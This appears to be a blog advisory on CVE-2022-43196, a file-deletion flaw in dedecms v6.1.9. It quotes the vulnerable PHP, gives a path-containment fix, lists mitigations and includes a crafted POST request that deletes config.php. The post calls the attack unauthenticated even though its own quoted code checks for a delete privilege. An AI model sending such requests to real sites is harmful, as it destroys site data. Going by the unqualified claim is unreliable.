CVE-2022-43196 refers to a critical security vulnerability found in the dedecms v6.1.9 content management system (CMS). This vulnerability allows an attacker to perform arbitrary file deletion on affected dedecms installations, potentially leading to further exploitation and serious harm to the website running the software.

In this post, we'll take a deep dive into the vulnerability, provide an example exploit, and discuss mitigation strategies. We'll also provide links to the original references and resources related to CVE-2022-43196.

Vulnerability Details

The vulnerability exists in the "file_manage_control.php" control component of the dedecms v6.1.9 software package. This file is responsible for managing file operations in the dedecms CMS. When processing user requests, it fails to properly validate and sanitize user input, allowing an attacker to manipulate the request in a way that triggers arbitrary file deletion.

An attacker could exploit this vulnerability by sending a specially crafted HTTP request to the affected dedecms instance, which would result in the unwanted deletion of any specified file.

The vulnerable code section in "file_manage_control.php" is as follows:

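if(empty($action) || $action=='del')
{
    // Only callers holding the sys_Delete privilege reach the delete path.
    if(CheckPurview('sys_Delete'))
    {
        $ENV_GOBACK_URL = (GetFunMainName($dwtNowUrl)."ENV_GOBACK_URL");
        // $furl is taken from the request and becomes the path to delete.
        $fullUrl = fillUrl($furl);
        if(empty($activepath) || empty($fullUrl)) {
            // Message text: "File deletion parameter error"
            ShowMsg("删除文件参数错误","-1");
            exit();
        }
        // Replaces "../" sequences with "/"; the result is not checked
        // against any allowed directory before it is passed to unlink().
        $fullUrl = preg_replace("#\.([\.]+)/#", "/", $fullUrl);
        unlink($fullUrl);
        // Message text: "Deleted successfully!"
        Trace("删除成功!",$ENV_GOBACK_URL);
        exit();
    }
}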

The 'furl' parameter is not properly sanitized, so user-controlled input reaches unlink() and can trigger arbitrary file deletion.
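For contrast with the handler above, the following added example (not DedeCMS code and not the vendor's patch) shows the containment check the delete path lacks: canonicalize the requested path and refuse deletion unless it resolves inside one allowed directory. The function names resolve_inside() and safe_delete(), the base-directory argument and the demo files are assumptions made for illustration.

```php
<?php
// Added example, not DedeCMS code. resolve_inside() and safe_delete()
// are hypothetical names; the demo files below are constructed.

function resolve_inside(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() resolves "..", "." and symlinks, and fails for missing paths.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare against the base plus a trailing separator, so that a sibling
    // such as "uploads-old" does not pass a prefix check for "uploads".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

function safe_delete(string $baseDir, string $requested): bool
{
    $target = resolve_inside($baseDir, $requested);
    return $target !== null && unlink($target);
}

// Constructed sandbox: one deletable file and one file outside the base.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'demo_' . bin2hex(random_bytes(4));
mkdir($root . '/uploads', 0700, true);
file_put_contents($root . '/uploads/old.jpg', 'x');
file_put_contents($root . '/config.php', '<?php // constructed');

// A file inside the allowed directory.
var_dump(safe_delete($root . '/uploads', 'old.jpg'));
// A path that resolves outside the allowed directory.
var_dump(safe_delete($root . '/uploads', '../config.php'));
// Whether the file outside the base is still present.
var_dump(file_exists($root . '/config.php'));

// Remove the sandbox.
unlink($root . '/config.php');
rmdir($root . '/uploads');
rmdir($root);
```

The check resolves symlinks at the moment it runs, so it assumes the allowed directory is not concurrently writable by an untrusted party.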

Exploit Details

To exploit this vulnerability, an attacker could send a crafted HTTP request with the 'furl' parameter set to point at an arbitrary file on the server. The following example shows a crafted HTTP request that would delete the "config.php" file:

POST /your-dedecms-path/file_manage_control.php HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: length

action=del&furl=config.php

This request would cause the "config.php" file to be deleted if the vulnerability is present in the targeted dedecms instance.

To protect your dedecms installation from this vulnerability, follow these steps:

1. Update dedecms to the latest available version to ensure you have all security patches applied, including those addressing CVE-2022-43196.

2. Check to see if your hosting provider or security plugins provide any mechanisms to block or limit access to sensitive controls and endpoints, such as "file_manage_control.php".

3. Regularly review and audit your dedecms instance to ensure that no unauthorized access or modifications have occurred.

References and Original Sources

- CVE entry on MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43196

- Security Advisory on PacketStorm: https://packetstormsecurity.com/files/168374/DedeCMS-6.1.9-Arbitrary-File-Deletion.html

- dedecms GitHub Repository: https://github.com/dedecms/DedeCMS

Conclusion

CVE-2022-43196 is a serious vulnerability in the dedecms v6.1.9 CMS software that allows for arbitrary file deletion. Be sure to update your dedecms installations and take appropriate measures to protect your websites. Stay informed of new vulnerabilities and security updates to maintain the security and integrity of your online presence.

Timeline

Published on: 11/23/2022 21:15:00 UTC
Last modified on: 11/28/2022 19:37:00 UTC